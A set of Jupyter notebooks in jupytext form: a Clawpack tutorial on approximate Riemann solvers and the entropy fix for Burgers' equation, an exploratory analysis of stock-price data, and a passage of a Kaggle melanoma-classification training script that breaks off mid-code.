# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # An approximate solver for Burgers' equation # As a first example, we return to the inviscid Burgers' equation that we studied in [Burgers.ipynb](Burgers.ipynb): # \begin{align} \label{burgers} # q_t + \left(\frac{1}{2}q^2\right)_x & = 0. # \end{align} # Although it is easy to solve the Riemann problem for (\ref{burgers}) exactly, it is nevertheless interesting to consider approximate solvers because a numerical scheme does not make use of the full Riemann solution. Furthermore, Burgers' equation provides a simple setting in which some of the intricacies of more complicated approximate solvers can be introduced. Recall that we are interested in **approximate solutions that consist entirely of traveling discontinuities**. # ## Shock wave solutions # # Recall that the exact Riemann solution for (\ref{burgers}) consists of a single shock or rarefaction wave. We have a shock if $q_l>q_r$ and we have a rarefaction if $q_l < q_r$. In the case of a shock wave, we can simply use the exact solution as our approximation. We have a single wave of strength $q_r-q_l$ traveling at speed $s=(q_r+q_l)/2$. # # In terms of fluxes, the numerical flux is $F=f(q_l)$ if $s>0$ and $F=f(q_r)$ if $s<0$. In the special case $s=0$ we have a stationary shock, and it must be that $f(q_l)=f(q_r) (=F)$. # ## Rarefaction wave solutions # # As discussed in [Approximate_solvers.ipynb](Approximate_solvers.ipynb), for numerical purposes it is convenient to approximate a rarefaction wave by a traveling discontinuity. For Burgers' equation this may seem unnecessary, but for more complicated solvers for systems of equations it will be essential. 
# # We will approximate the effect of the rarefaction wave by a fictitious shock: # $${\cal W} = q_r-q_l$$ # whose speed is given by the Rankine-Hugoniot jump condition: # $$s = \frac{f(q_r)-f(q_l)}{q_r-q_l} = \frac{q_r + q_l}{2}.$$ # Recall that this is indeed a weak solution of the Riemann problem. This fictitious shock is not entropy-satisfying, but as long as it's traveling entirely to the left or entirely to the right, the effect on the numerical solution will be the same as if we used a (entropy-satisfying) rarefaction wave. The numerical flux is again $F=f(q_l)$ if $s>0$ and $F=f(q_r)$ if $s<0$. # Because this is a scalar equation with convex flux, both the Roe and HLL approaches will simplify to what we have already described. But we briefly discuss them here to further illustrate the main ideas. # ## A Roe solver # Let us consider a linearized solver, in which we replace our nonlinear hyperbolic system with a linearization about some intermediate state $\hat{q}$. For Burgers' equation, the quasilinear form is $q_t + q q_x = 0$ and the linearization gives # $$q_t + \hat{q}q_x = 0.$$ # This is simply the advection equation with velocity $\hat{q}$. The solution of the Riemann problem for this equation consists of a wave ${\cal W} = q_r - q_l$ traveling at speed $\hat{q}$. It remains only to determine the state $\hat{q}$, and thus the wave speed. # # The defining feature of a Roe linearization is that it gives the exact solution in case the states $(q_r, q_l)$ lie on a single Hugoniot locus -- i.e., when the solution is a single shock. We can achieve this by choosing # $$\hat{q} = \frac{q_r + q_l}{2}.$$ # This is equivalent to using the approximate solver described already in the sections above. # ### Examples # Below we show solutions for three examples; the first involves a shock, the second a (non-transonic) rarefaction, and the third a transonic rarefaction. 
In the first row we plot the exact solution (computed using code from [exact_solvers/burgers.py](exact_solvers/burgers.py)) in terms of the waves in the x-t plane; in the second row we plot numerical solutions obtained with Clawpack by using a simple first-order method combined with the Riemann solver.  The code for the Riemann solver as used in Clawpack can be examined [in the Riemann github repository](https://github.com/clawpack/riemann/blob/c0a41c664e9a13d35a113409dea92f3c87648d09/riemann/burgers_1D_py.py) or by looking at the local copy on your computer if you have installed Clawpack.

# + tags=["hide"]
# %matplotlib inline

# + tags=["hide"]
# %config InlineBackend.figure_format = 'svg'
import matplotlib.pyplot as plt
from ipywidgets import interact
from ipywidgets import widgets
from ipywidgets import IntSlider
from exact_solvers import burgers
from utils import riemann_tools
# -


def setup(q_l, q_r, N=500, efix=False):
    """Build a PyClaw controller for the Burgers Riemann problem.

    Args:
      q_l: left initial state.
      q_r: right initial state.
      N: number of grid cells on [-1, 1].
      efix: whether the Riemann solver applies the transonic entropy fix.

    Returns:
      A configured (but not yet run) ``pyclaw.Controller``.
    """
    from clawpack import pyclaw
    from clawpack import riemann
    # First-order Godunov method with the pure-Python Burgers solver.
    rs = riemann.burgers_1D_py.burgers_1D
    solver = pyclaw.ClawSolver1D(rs)
    solver.order = 1
    solver.kernel_language = 'Python'
    # Zero-order extrapolation (outflow) at both boundaries.
    solver.bc_lower[0]=pyclaw.BC.extrap
    solver.bc_upper[0]=pyclaw.BC.extrap
    x = pyclaw.Dimension(-1.0,1.0,N,name='x')
    domain = pyclaw.Domain([x])
    state = pyclaw.State(domain,1)
    state.problem_data['efix'] = efix
    # Riemann initial data: q_l for x <= 0, q_r for x > 0.
    xc = state.grid.p_centers[0]
    state.q[0 ,:] = (xc<=0)*q_l + (xc>0)*q_r
    claw = pyclaw.Controller()
    claw.tfinal = 0.5
    claw.solution = pyclaw.Solution(state,domain)
    claw.solver = solver
    claw.keep_copy = True  # keep intermediate frames so we can animate below
    claw.verbosity=0
    return claw


# +
# Run the three canonical Riemann problems and compute their exact solutions.
shock = setup(2.,1.)
shock.run()
shocksol = burgers.exact_riemann_solution(2.,1.)

raref = setup(1.,2.)
raref.run()
rarefsol = burgers.exact_riemann_solution(1.,2.)

transonic = setup(-1.,2.)
transonic.run()
transonicsol = burgers.exact_riemann_solution(-1.,2.)
def plot_frame(i):
    """Plot the three Riemann solutions at frame index ``i``.

    Top row: exact solutions as waves in the x-t plane at t = i/10;
    bottom row: the corresponding Clawpack numerical solutions.
    """
    fig, axes = plt.subplots(2,3,figsize=(8,4))
    t = i/10.
    cases = [(shock, shocksol, 'Shock'),
             (raref, rarefsol, 'Rarefaction'),
             (transonic, transonicsol, 'Transonic rarefaction')]
    for col, (claw, exact, label) in enumerate(cases):
        top = axes[0][col]
        bottom = axes[1][col]
        top.set_xlim((-1,1))
        top.set_ylim((-1.1,2.1))
        xc = claw.frames[0].grid.x.centers
        bottom.plot(xc, claw.frames[i].q[0,:], '-k', lw=2)
        bottom.set_title(label)
        riemann_tools.plot_waves(*exact, ax=top, t=t)
    plt.tight_layout()
    plt.show()

interact(plot_frame, i=IntSlider(min=0, max=10, description='Frame'));
# -

# The solutions obtained for the shock wave and for the first rarefaction wave are good approximations of the true solution.  In the case of the transonic rarefaction, however, we see that part of the rarefaction has been replaced by an entropy-violating shock.  At the end of this chapter we will show how to apply an *entropy fix* so that the solver gives a good approximation also in the transonic case.

# ## Two-wave solvers

# For Burgers' equation, the Riemann solution consists only of a single wave.  It is thus natural to modify the HLL approach by assuming that one of the waves vanishes, and denote the speed of the other wave simply by $s$.  Then the conservation condition discussed in [Approximate_solvers.ipynb](Approximate_solvers.ipynb#Two-wave-solvers) reduces to
# $$f(q_r) - f(q_l) = s (q_r - q_l),$$
# which is just the Rankine-Hugoniot condition and again leads to the speed discussed above.  Since the solution involves only one wave, that wave must carry the entire jump $q_r - q_l$, so this solver is entirely equivalent to that already described.
# # It is also possible to follow the full HLL approach, taking # \begin{align*} # s_1 & = \min f'(q) = \min(q_l, q_r) \\ # s_2 & = \max f'(q) = \max(q_l, q_r). # \end{align*} # Regardless of the values of $q_l$ and $q_r$, this leads to # $$q_m = \frac{q_r + q_l}{2},$$ # so that each of the two waves carries half of the jump. # ## Transonic rarefactions # # In the approaches above, the solution was approximated by a single wave traveling either to the left or right. For this scalar problem, this "approximation" is, in fact, an exact weak solution of the Riemann problem. As discussed already, we do not typically need to worry about the fact that it may be entropy-violating, since the effect on the numerical solution (after averaging) is identical to that of the entropy-satisfying solution. # # However, if $q_l < 0 < q_r$, then the true solution is a transonic rarefaction, in which part of the wave travels to the left and part travels to the right. In this case, the true Riemann solution would lead to changes to both the left and right adjacent cells, whereas an approximate solution with a single wave will only modify one or the other. This leads to an incorrect numerical solution (on the macroscopic level). It is therefore necessary to modify the Riemann solver, imposing what is known as an *entropy fix* in the transonic case. # # Specifically, we use a solution consisting of two waves, each of which captures the net effect of the corresponding rarefaction wave that appears in the exact solution: # # \begin{align} # {\cal W}_1 & = q_m - q_l, & s_1 = \frac{q_l + q_m}{2} \\ # {\cal W}_2 & = q_r - q_m, & s_2 = \frac{q_m + q_r}{2}. # \end{align} # # For Burgers' equation, the value $q_s=0$ is the *sonic point* satisfying $f(q_s)=0$. A transonic rarefaction wave takes the value $q_s$ along $x/t = 0$ and so it makes sense to choose $q_m = 0$. 
The formulas above then simplify to
#
# \begin{align}
# {\cal W}_1 & = - q_l, & s_1 = \frac{q_l}{2} \\
# {\cal W}_2 & = q_r, & s_2 = \frac{q_r}{2}.
# \end{align}
#
# Note that this can also be viewed as an HLL solver, although not with the usual choice of wave speeds.  Choosing the wave speeds $s^1=q_l/2$ and $s^2=q_r/2$ and then solving for $q_m$ by requiring conservation gives $q_m=0$.

# We now repeat the example given above, but with the entropy fix applied.

# +
# Re-run the three Riemann problems with the entropy fix enabled.
shock_efix = setup(2.,1.,efix=True)
shock_efix.run()
shocksol = burgers.exact_riemann_solution(2.,1.)

raref_efix = setup(1.,2.,efix=True)
raref_efix.run()
rarefsol = burgers.exact_riemann_solution(1.,2.)

transonic_efix = setup(-1.,2.,efix=True)
transonic_efix.run()
transonicsol = burgers.exact_riemann_solution(-1.,2.)


def plot_frame(i):
    # Top row: exact solutions; bottom row: entropy-fixed numerical
    # solutions at t = i/10.
    fig, axes = plt.subplots(2,3,figsize=(8,4))
    for ax in axes[0]:
        ax.set_xlim((-1,1)); ax.set_ylim((-1.1,2.1))
    sxc = shock_efix.frames[0].grid.x.centers
    rxc = raref_efix.frames[0].grid.x.centers
    txc = transonic_efix.frames[0].grid.x.centers
    axes[1][0].plot(sxc, shock_efix.frames[i].q[0,:],'-k',lw=2)
    axes[1][0].set_title('Shock')
    axes[1][1].plot(rxc, raref_efix.frames[i].q[0,:],'-k',lw=2)
    axes[1][1].set_title('Rarefaction')
    axes[1][2].plot(txc, transonic_efix.frames[i].q[0,:],'-k',lw=2)
    axes[1][2].set_title('Transonic rarefaction')
    t = i/10.
    riemann_tools.plot_waves(*shocksol,ax=axes[0][0],t=t)
    riemann_tools.plot_waves(*rarefsol,ax=axes[0][1],t=t)
    riemann_tools.plot_waves(*transonicsol,ax=axes[0][2],t=t)
    plt.tight_layout()
    plt.show()

interact(plot_frame, i=IntSlider(min=0, max=10, description='Frame'));
# -

# The entropy fix has no effect on the first two solutions, since it is applied only in the case of a transonic rarefaction.  The third solution is greatly improved, and will converge to the correct weak solution as the grid is refined.
Burgers_approximate.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import pandas as pd #importing necessary libraries import numpy as np data = pd.read_csv('DataFrame.csv') #Reading csv file and creating DataFrame print(data.shape) data.head() data.drop('Unnamed: 7' , axis = 1 , inplace = True) #Dropping unnecessary Column:-> Unnamed: 7 data.rename(columns = str.upper , inplace = True) data # # CONVERTING STRING INTO DATE TIME SERIES import datetime data['DATE'] = pd.to_datetime(data['DATE'] , format = "%Y%m%d") data.head() import missingno as msno #Checking for the missing entries msno.bar(data) data.describe() #Statistics of the Dataset data.info() data[data.duplicated()] #Checking for the duplicated entries # # CONSIDERING ANOTHER DATASET df2 = pd.read_csv('MSFT.csv') df2.head() df2.rename(columns = str.upper , inplace = True) df2['DATE'] = pd.to_datetime(df2['DATE'] , format = "%Y-%m-%d") df2.head() df2[df2.duplicated()] df2.describe() df2.isna().sum() df2.info() df2.value_counts() # # EDA ANALYSIS (DataFrame.csv) import matplotlib.pyplot as plt import seaborn as sns d1 = data.copy() # + plt.figure(figsize=(20,10)) #creating distribution plots of various attributes plt.subplot(2,2,1) sns.distplot(x = d1['OPEN'] , kde=False , color = 'red' , hist_kws = {'alpha':1}) plt.xlabel('OPEN') plt.title('Distribution plot of OPEN') plt.subplot(2,2,2) sns.distplot(x = d1['HIGH'] , kde=False , color = 'darkblue') plt.xlabel('HIGH') plt.title('Distribution plot of HIGH') plt.subplot(2,2,3) sns.distplot(x = d1['LOW'] , kde=False , color = 'yellow' , hist_kws = {'alpha':1}) plt.xlabel('LOW') plt.title('Distribution plot of LOW') plt.subplot(2,2,4) sns.distplot(x = d1['CLOSE'] , kde=False , color = 'darkgreen') plt.xlabel('CLOSE') plt.title('Distribution plot of CLOSE') # + plt.figure(figsize=(20,10)) #creating scatter plots 
of various attributes plt.subplot(2,2,1) sns.scatterplot(x = d1['OPEN'] , y = d1['CLOSE'] , color = 'red') plt.xlabel('OPEN') plt.ylabel('CLOSE') plt.title('Scatter plot of OPEN and CLOSE') plt.subplot(2,2,2) sns.scatterplot(x = d1['HIGH'] , y = d1['LOW'] , color = 'darkblue') plt.xlabel('HIGH') plt.ylabel('LOW') plt.title('Scatter plot of HIGH and LOW') plt.subplot(2,2,3) sns.scatterplot(x = d1['LOW'] , y = d1['OPEN'] , color = 'yellow') plt.xlabel('LOW') plt.ylabel('OPEN') plt.title('Scatter plot of LOW and OPEN') plt.subplot(2,2,4) sns.scatterplot(x = d1['CLOSE'] , y = d1['HIGH'] , color = 'darkgreen') plt.xlabel('CLOSE') plt.ylabel('HIGH') plt.title('Scatter plot of CLOSE and HIGH') # + plt.figure(figsize=(20,14)) #plot of line plot btwn Date and various other attributes plt.subplot(2,2,1) plt.title('Line plot b/w DATE and OPEN') sns.lineplot(x = d1['DATE'] , y = d1['OPEN'] , color = 'Red') plt.xticks(rotation = 45); plt.subplot(2,2,2) plt.title('Line plot b/w DATE and CLOSE') sns.lineplot(x = d1['DATE'] , y = d1['CLOSE'] , color = 'Blue') plt.xticks(rotation = 45); plt.subplot(2,2,3) plt.title('Line plot b/w DATE and LOW') sns.lineplot(x = d1['DATE'] , y = d1['LOW'] , color = 'Green') plt.xticks(rotation = 45); plt.subplot(2,2,4) plt.title('Line plot b/w DATE and HIGH') sns.lineplot(x = d1['DATE'] , y = d1['HIGH'] , color = 'Black') plt.xticks(rotation = 45); # + plt.figure(figsize=(20,10)) #creating Box plots of various attributes plt.subplot(2,2,1) sns.boxplot(x = d1['OPEN'] , color = 'red') plt.xlabel('OPEN') plt.title('Distribution plot of OPEN') plt.subplot(2,2,2) sns.boxplot(x = d1['HIGH'] , color = 'darkblue') plt.xlabel('HIGH') plt.title('Distribution plot of HIGH') plt.subplot(2,2,3) sns.boxplot(x = d1['LOW'] , color = 'yellow') plt.xlabel('LOW') plt.title('Distribution plot of LOW') plt.subplot(2,2,4) sns.boxplot(x = d1['CLOSE'] , color = 'darkgreen') plt.xlabel('CLOSE') plt.title('Distribution plot of CLOSE') # - sns.heatmap(d1.corr() , vmin = -1 , 
vmax = 1 , annot = True , cmap = 'Blues') #heat map to determine correlation # # EDA ANALYSIS (MSFT.csv) d2 = df2.copy() # + plt.figure(figsize=(15,15)) #creating distribution plots of various attributes plt.subplot(3,3,1) sns.distplot(x = d2['OPEN'] , kde=False , color = 'red' , hist_kws = {'alpha':1}) plt.xlabel('OPEN') plt.title('Distribution plot of OPEN') plt.subplot(3,3,2) sns.distplot(x = d2['HIGH'] , kde=False , color = 'darkblue') plt.xlabel('HIGH') plt.title('Distribution plot of HIGH') plt.subplot(3,3,3) sns.distplot(x = d2['LOW'] , kde=False , color = 'yellow' , hist_kws = {'alpha':1}) plt.xlabel('LOW') plt.title('Distribution plot of LOW') plt.subplot(3,3,4) sns.distplot(x = d2['CLOSE'] , kde=False , color = 'purple' , hist_kws = {'alpha':1}) plt.xlabel('CLOSE') plt.title('Distribution plot of CLOSE') plt.subplot(3,3,5) sns.distplot(x = d2['ADJ CLOSE'] , kde=False , color = 'black' , hist_kws = {'alpha':1}) plt.xlabel('ADJ CLOSE') plt.title('Distribution plot of ADJ CLOSE') plt.subplot(3,3,6) sns.distplot(x = d2['VOLUME'] , kde=False , color = 'brown' , hist_kws = {'alpha':1}) plt.xlabel('VOLUME') plt.title('Distribution plot of VOLUME') # - plt.figure(figsize=(15,10)) #plot of line plot btwn Date and various other attributes d2 = d2.set_index('DATE') sns.lineplot(data = d2) # + plt.figure(figsize=(20,10)) #creating scatter plots of various attributes plt.subplot(2,2,1) sns.scatterplot(x = d2['OPEN'] , y = d2['VOLUME'] , color = 'red') plt.xlabel('OPEN') plt.ylabel('VOLUME') plt.title('Scatter plot of OPEN and VOLUME') plt.subplot(2,2,2) sns.scatterplot(x = d2['HIGH'] , y = d2['VOLUME'] , color = 'darkblue') plt.xlabel('HIGH') plt.ylabel('VOLUME') plt.title('Scatter plot of HIGH and VOLUME') plt.subplot(2,2,3) sns.scatterplot(x = d2['LOW'] , y = d2['ADJ CLOSE'] , color = 'yellow') plt.xlabel('LOW') plt.ylabel('ADJ CLOSE') plt.title('Scatter plot of LOW and ADJ CLOSE') plt.subplot(2,2,4) sns.scatterplot(x = d2['OPEN'] , y = d2['ADJ CLOSE'] , color = 
'darkgreen') plt.xlabel('CLOSE') plt.ylabel('ADJ CLOSE') plt.title('Scatter plot of CLOSE and ADJ CLOSE') # + plt.figure(figsize=(20,15)) #creating box plots of various attributes plt.subplot(3,2,1) sns.boxplot(x = d2['OPEN'] , color = 'red') plt.xlabel('OPEN') plt.title('Distribution plot of OPEN') plt.subplot(3,2,2) sns.boxplot(x = d2['HIGH'] , color = 'darkblue') plt.xlabel('HIGH') plt.title('Distribution plot of HIGH') plt.subplot(3,2,3) sns.boxplot(x = d2['LOW'] , color = 'yellow') plt.xlabel('LOW') plt.title('Distribution plot of LOW') plt.subplot(3,2,4) sns.boxplot(x = d2['CLOSE'] , color = 'darkgreen') plt.xlabel('CLOSE') plt.title('Distribution plot of CLOSE') plt.subplot(3,2,5) sns.boxplot(x = d2['ADJ CLOSE'] , color = 'pink') plt.xlabel('ADJ CLOSE') plt.title('Distribution plot of ADJ CLOSE') plt.subplot(3,2,6) sns.boxplot(x = d2['VOLUME'] , color = 'brown') plt.xlabel('VOLUME') plt.title('Distribution plot of VOLUME') # + plt.figure(figsize=(22,17)) #creating violin plots of various attributes plt.subplot(3,2,1) sns.violinplot(x = d2['OPEN'] , color = 'red') plt.xlabel('OPEN') plt.title('Distribution plot of OPEN') plt.subplot(3,2,2) sns.violinplot(x = d2['HIGH'] , color = 'darkblue') plt.xlabel('HIGH') plt.title('Distribution plot of HIGH') plt.subplot(3,2,3) sns.violinplot(x = d2['LOW'] , color = 'yellow') plt.xlabel('LOW') plt.title('Distribution plot of LOW') plt.subplot(3,2,4) sns.violinplot(x = d2['CLOSE'] , color = 'darkgreen') plt.xlabel('CLOSE') plt.title('Distribution plot of CLOSE') plt.subplot(3,2,5) sns.violinplot(x = d2['ADJ CLOSE'] , color = 'pink') plt.xlabel('CLOSE') plt.title('Distribution plot of ADJ CLOSE') plt.subplot(3,2,6) sns.violinplot(x = d2['VOLUME'] , color = 'brown') plt.xlabel('VOLUME') plt.title('Distribution plot of VOLUME') # - sns.heatmap(d2.corr() , vmin = -1 , vmax = 1 , annot = True , cmap = 'Paired_r') #heat map to determine correlation
Datasets/.ipynb_checkpoints/STOCK PRICE PREDICTION TECHNOCOLABS-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Dependencies # + _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19" _kg_hide-input=true _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5" # !pip install --quiet efficientnet # # !pip install --quiet image-classifiers # + _kg_hide-input=true import warnings, json, re, glob, math # from scripts_step_lr_schedulers import * from melanoma_utility_scripts import * from kaggle_datasets import KaggleDatasets from sklearn.model_selection import KFold import tensorflow.keras.layers as L import tensorflow.keras.backend as K from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, LearningRateScheduler from tensorflow.keras import optimizers, layers, metrics, losses, Model import tensorflow_addons as tfa import efficientnet.tfkeras as efn # from classification_models.tfkeras import Classifiers SEED = 42 seed_everything(SEED) warnings.filterwarnings('ignore') # - # ## TPU configuration # + _kg_hide-input=true strategy, tpu = set_up_strategy() REPLICAS = strategy.num_replicas_in_sync print(f'REPLICAS: {REPLICAS}') AUTO = tf.data.experimental.AUTOTUNE # - # # Model parameters # + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _kg_hide-input=true _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a" config = { "HEIGHT": 256, "WIDTH": 256, "CHANNELS": 3, "BATCH_SIZE": 32, "EPOCHS": 12, "LEARNING_RATE": 1e-3, "ES_PATIENCE": 5, "N_FOLDS": 5, "N_USED_FOLDS": 5, "TTA_STEPS": 11, "BASE_MODEL": 'EfficientNetB6', "BASE_MODEL_WEIGHTS": 'imagenet', "DATASET_PATH": 'melanoma-256x256' } with open('config.json', 'w') as json_file: json.dump(json.loads(json.dumps(config)), json_file) config # - # # Load data # + _kg_hide-input=true database_base_path = '/kaggle/input/siim-isic-melanoma-classification/' train = pd.read_csv(database_base_path + 'train.csv') test = 
pd.read_csv(database_base_path + 'test.csv') print('Train samples: %d' % len(train)) display(train.head()) print(f'Test samples: {len(test)}') display(test.head()) GCS_PATH = KaggleDatasets().get_gcs_path(f"melanoma-{config['HEIGHT']}x{config['WIDTH']}") GCS_2019_PATH = KaggleDatasets().get_gcs_path(f"isic2019-{config['HEIGHT']}x{config['WIDTH']}") GCS_MALIGNANT_PATH = KaggleDatasets().get_gcs_path(f"malignant-v2-{config['HEIGHT']}x{config['WIDTH']}") # - # # Augmentations # + _kg_hide-input=true def data_augment(image): p_rotation = tf.random.uniform([], 0, 1.0, dtype=tf.float32) p_rotate = tf.random.uniform([], 0, 1.0, dtype=tf.float32) p_cutout = tf.random.uniform([], 0, 1.0, dtype=tf.float32) p_shear = tf.random.uniform([], 0, 1.0, dtype=tf.float32) p_crop = tf.random.uniform([], 0, 1.0, dtype=tf.float32) if p_shear > .2: if p_shear > .6: image = transform_shear(image, config['HEIGHT'], shear=5.) else: image = transform_shear(image, config['HEIGHT'], shear=-5.) if p_rotation > .2: if p_rotation > .6: image = transform_rotation(image, config['HEIGHT'], rotation=45.) else: image = transform_rotation(image, config['HEIGHT'], rotation=-45.) if p_crop > .5: image = data_augment_crop(image) if p_rotate > .2: image = data_augment_rotate(image) image = data_augment_spatial(image) image = tf.image.random_saturation(image, 0.7, 1.3) image = tf.image.random_contrast(image, 0.8, 1.2) image = tf.image.random_brightness(image, 0.1) if p_cutout > .7: image = data_augment_cutout(image) return image def data_augment_tta(image): p_rotation = tf.random.uniform([], 0, 1.0, dtype=tf.float32) p_rotate = tf.random.uniform([], 0, 1.0, dtype=tf.float32) p_crop = tf.random.uniform([], 0, 1.0, dtype=tf.float32) if p_rotation > .2: if p_rotation > .6: image = transform_rotation(image, config['HEIGHT'], rotation=45.) else: image = transform_rotation(image, config['HEIGHT'], rotation=-45.) 
if p_crop > .5: image = data_augment_crop(image) if p_rotate > .2: image = data_augment_rotate(image) image = data_augment_spatial(image) image = tf.image.random_saturation(image, 0.7, 1.3) image = tf.image.random_contrast(image, 0.8, 1.2) image = tf.image.random_brightness(image, 0.1) return image def data_augment_spatial(image): p_spatial = tf.random.uniform([], 0, 1.0, dtype=tf.float32) image = tf.image.random_flip_left_right(image) image = tf.image.random_flip_up_down(image) if p_spatial > .75: image = tf.image.transpose(image) return image def data_augment_rotate(image): p_rotate = tf.random.uniform([], 0, 1.0, dtype=tf.float32) if p_rotate > .66: image = tf.image.rot90(image, k=3) # rotate 270º elif p_rotate > .33: image = tf.image.rot90(image, k=2) # rotate 180º else: image = tf.image.rot90(image, k=1) # rotate 90º return image def data_augment_crop(image): p_crop = tf.random.uniform([], 0, 1.0, dtype=tf.float32) crop_size = tf.random.uniform([], int(config['HEIGHT']*.7), config['HEIGHT'], dtype=tf.int32) if p_crop > .5: image = tf.image.random_crop(image, size=[crop_size, crop_size, config['CHANNELS']]) else: if p_crop > .4: image = tf.image.central_crop(image, central_fraction=.7) elif p_crop > .2: image = tf.image.central_crop(image, central_fraction=.8) else: image = tf.image.central_crop(image, central_fraction=.9) image = tf.image.resize(image, size=[config['HEIGHT'], config['WIDTH']]) return image def data_augment_cutout(image, min_mask_size=(int(config['HEIGHT'] * .1), int(config['HEIGHT'] * .1)), max_mask_size=(int(config['HEIGHT'] * .125), int(config['HEIGHT'] * .125))): p_cutout = tf.random.uniform([], 0, 1.0, dtype=tf.float32) if p_cutout > .85: # 10~15 cut outs n_cutout = tf.random.uniform([], 10, 15, dtype=tf.int32) image = random_cutout(image, config['HEIGHT'], config['WIDTH'], min_mask_size=min_mask_size, max_mask_size=max_mask_size, k=n_cutout) elif p_cutout > .6: # 5~10 cut outs n_cutout = tf.random.uniform([], 5, 10, dtype=tf.int32) image 
= random_cutout(image, config['HEIGHT'], config['WIDTH'], min_mask_size=min_mask_size, max_mask_size=max_mask_size, k=n_cutout) elif p_cutout > .25: # 2~5 cut outs n_cutout = tf.random.uniform([], 2, 5, dtype=tf.int32) image = random_cutout(image, config['HEIGHT'], config['WIDTH'], min_mask_size=min_mask_size, max_mask_size=max_mask_size, k=n_cutout) else: # 1 cut out image = random_cutout(image, config['HEIGHT'], config['WIDTH'], min_mask_size=min_mask_size, max_mask_size=max_mask_size, k=1) return image # - # ## Auxiliary functions # + _kg_hide-input=true def read_labeled_tfrecord(example): tfrec_format = { 'image' : tf.io.FixedLenFeature([], tf.string), 'image_name' : tf.io.FixedLenFeature([], tf.string), 'patient_id' : tf.io.FixedLenFeature([], tf.int64), 'sex' : tf.io.FixedLenFeature([], tf.int64), 'age_approx' : tf.io.FixedLenFeature([], tf.int64), 'anatom_site_general_challenge': tf.io.FixedLenFeature([], tf.int64), 'diagnosis' : tf.io.FixedLenFeature([], tf.int64), 'target' : tf.io.FixedLenFeature([], tf.int64) } example = tf.io.parse_single_example(example, tfrec_format) return example['image'], example['target'] def read_unlabeled_tfrecord(example, return_image_name): tfrec_format = { 'image' : tf.io.FixedLenFeature([], tf.string), 'image_name' : tf.io.FixedLenFeature([], tf.string), } example = tf.io.parse_single_example(example, tfrec_format) return example['image'], example['image_name'] if return_image_name else 0 def prepare_image(img, augment=None, dim=256): img = tf.image.decode_jpeg(img, channels=3) img = tf.cast(img, tf.float32) / 255.0 if augment: img = augment(img) img = tf.reshape(img, [dim, dim, 3]) return img def get_dataset(files, augment=None, shuffle=False, repeat=False, labeled=True, return_image_names=True, batch_size=16, dim=256): ds = tf.data.TFRecordDataset(files, num_parallel_reads=AUTO) ds = ds.cache() if repeat: ds = ds.repeat() if shuffle: ds = ds.shuffle(1024*8) opt = tf.data.Options() opt.experimental_deterministic = False ds = 
ds.with_options(opt) if labeled: ds = ds.map(read_labeled_tfrecord, num_parallel_calls=AUTO) else: ds = ds.map(lambda example: read_unlabeled_tfrecord(example, return_image_names), num_parallel_calls=AUTO) ds = ds.map(lambda img, imgname_or_label: (prepare_image(img, augment=augment, dim=dim), imgname_or_label), num_parallel_calls=AUTO) ds = ds.batch(batch_size * REPLICAS) ds = ds.prefetch(AUTO) return ds def count_data_items(filenames): n = [int(re.compile(r"-([0-9]*)\.").search(filename).group(1)) for filename in filenames] return np.sum(n) # - # ## Learning rate scheduler # + _kg_hide-input=true def get_lr_callback(batch_size=8): lr_start = 0.000005 lr_max = 0.00000125 * REPLICAS * config['BATCH_SIZE'] lr_min = 0.000001 lr_ramp_ep = 5 lr_sus_ep = 0 lr_decay = 0.8 def lrfn(epoch): if epoch < lr_ramp_ep: lr = (lr_max - lr_start) / lr_ramp_ep * epoch + lr_start elif epoch < lr_ramp_ep + lr_sus_ep: lr = lr_max else: lr = (lr_max - lr_min) * lr_decay**(epoch - lr_ramp_ep - lr_sus_ep) + lr_min return lr lr_callback = tf.keras.callbacks.LearningRateScheduler(lrfn, verbose=False) return lr_callback # - # # Model # + _kg_hide-input=true # Initial bias #2019 pos = 2.3% #2018 pos = 1.3% pos = len(train[train['target'] == 1]) neg = len(train[train['target'] == 0]) initial_bias = np.log([pos/neg]) print('Bias') print(pos) print(neg) print(initial_bias) # class weights total = len(train) weight_for_0 = (1 / neg)*(total)/2.0 weight_for_1 = (1 / pos)*(total)/2.0 class_weight = {0: weight_for_0, 1: weight_for_1} print('Class weight') print(class_weight) # - def model_fn(input_shape=(256, 256, 3)): input_image = L.Input(shape=input_shape, name='input_image') base_model = efn.EfficientNetB6(input_shape=input_shape, weights=config['BASE_MODEL_WEIGHTS'], include_top=False) x = base_model(input_image) x = L.GlobalAveragePooling2D()(x) output = L.Dense(1, activation='sigmoid', name='output', bias_initializer=tf.keras.initializers.Constant(initial_bias))(x) model = 
Model(inputs=input_image, outputs=output) opt = optimizers.Adam(learning_rate=0.001) loss = losses.BinaryCrossentropy(label_smoothing=0.05) model.compile(optimizer=opt, loss=loss,metrics=['AUC']) return model # # Training # + _kg_hide-input=true _kg_hide-output=true skf = KFold(n_splits=config['N_USED_FOLDS'], shuffle=True, random_state=SEED) oof_pred = []; oof_tar = []; oof_val = []; oof_names = []; oof_folds = []; history_list = []; oof_pred_last = [] preds = np.zeros((len(test), 1)) preds_last = np.zeros((len(test), 1)) for fold,(idxT, idxV) in enumerate(skf.split(np.arange(15))): if tpu: tf.tpu.experimental.initialize_tpu_system(tpu) print(f'\nFOLD: {fold+1}') print(f'TRAIN: {idxT} VALID: {idxV}') # CREATE TRAIN AND VALIDATION SUBSETS TRAINING_FILENAMES = tf.io.gfile.glob([GCS_PATH + '/train%.2i*.tfrec' % x for x in idxT]) # Add external data # TRAINING_FILENAMES += tf.io.gfile.glob([GCS_2019_PATH + '/train%.2i*.tfrec' % (x*2+1) for x in idxT]) # 2019 data # TRAINING_FILENAMES += tf.io.gfile.glob([GCS_2019_PATH + '/train%.2i*.tfrec' % (x*2) for x in idxT]) # 2018 data # Add extra malignant data TRAINING_FILENAMES += tf.io.gfile.glob([GCS_MALIGNANT_PATH 